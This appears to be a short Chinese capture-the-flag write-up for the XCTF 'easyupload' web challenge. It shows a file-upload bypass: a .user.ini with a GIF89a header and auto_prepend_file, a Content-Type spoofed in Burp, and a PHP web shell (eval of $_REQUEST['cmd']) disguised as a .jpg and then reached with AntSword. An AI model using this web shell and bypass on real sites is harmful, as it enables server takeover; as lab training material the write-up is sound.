攻防世界-WEB-easyupload

1.新建.user.ini文件,内容如下

GIF89a

auto_prepend_file=a.jpg

2.上传该文件,并用burp抓包,将Content-Type: application/octet-stream修改为

Content-Type: image/jpg

3.放包,结果如下

  1. 新建a.txt文件,内容为

GIF89a

<?=eval($_REQUEST['cmd']);?>

保存后将文件后缀修改为.jpg

5.直接上传该文件即可成功上传

PS:按F12打开调试器选择网络查看上传文件的地址

如图所示上传地址为:****/uploads/index.php

6.直接蚁剑连接

7.结果如下

8.查找flag

相关推荐
testpassportcn1 天前
UiPath-ADPV1 認證介紹|Automation Developer Professional v1
网络·学习·改行学it
testpassportcn2 天前
CompTIA A+ 220-1201 認證介紹|CompTIA A+ Core 1 考試內容、題型與高效備考指南
网络·学习·改行学it
testpassportcn8 天前
Dell D-MSS-DS-23 認證介紹|Dell Data Scientist 考試全解析與高效備考指南
网络·学习·改行学it
Aurorar0rua8 天前
CS50 x 2024 Notes Scratch - 02
改行学it
testpassportcn12 天前
Fortinet FCSS_SDW_AR-7.4 認證介紹|Fortinet Secure SD-WAN 高級路由專家考試
网络·学习·改行学it
testpassportcn15 天前
Technology Solutions Professional NS0-005 認證介紹【NetApp 官方認證
网络·学习·改行学it
Maxwell_li121 天前
机器学习知识点梳理(回归模型、分类模型、聚类模型、评估方法)
机器学习·分类·回归·学习方法·聚类·改行学it
蕨蕨学AI21 天前
【2025】个人学习与实践总结
经验分享·学习·改行学it
蒙奇D索大22 天前
【数据结构】排序算法精讲 | 快速排序全解:高效实现、性能评估、实战剖析
数据结构·笔记·学习·考研·算法·排序算法·改行学it
蒙奇D索大24 天前
【数据结构】排序算法精讲 | 交换排序全解:交换思想、效率对比与实战代码剖析
数据结构·笔记·考研·算法·排序算法·改行学it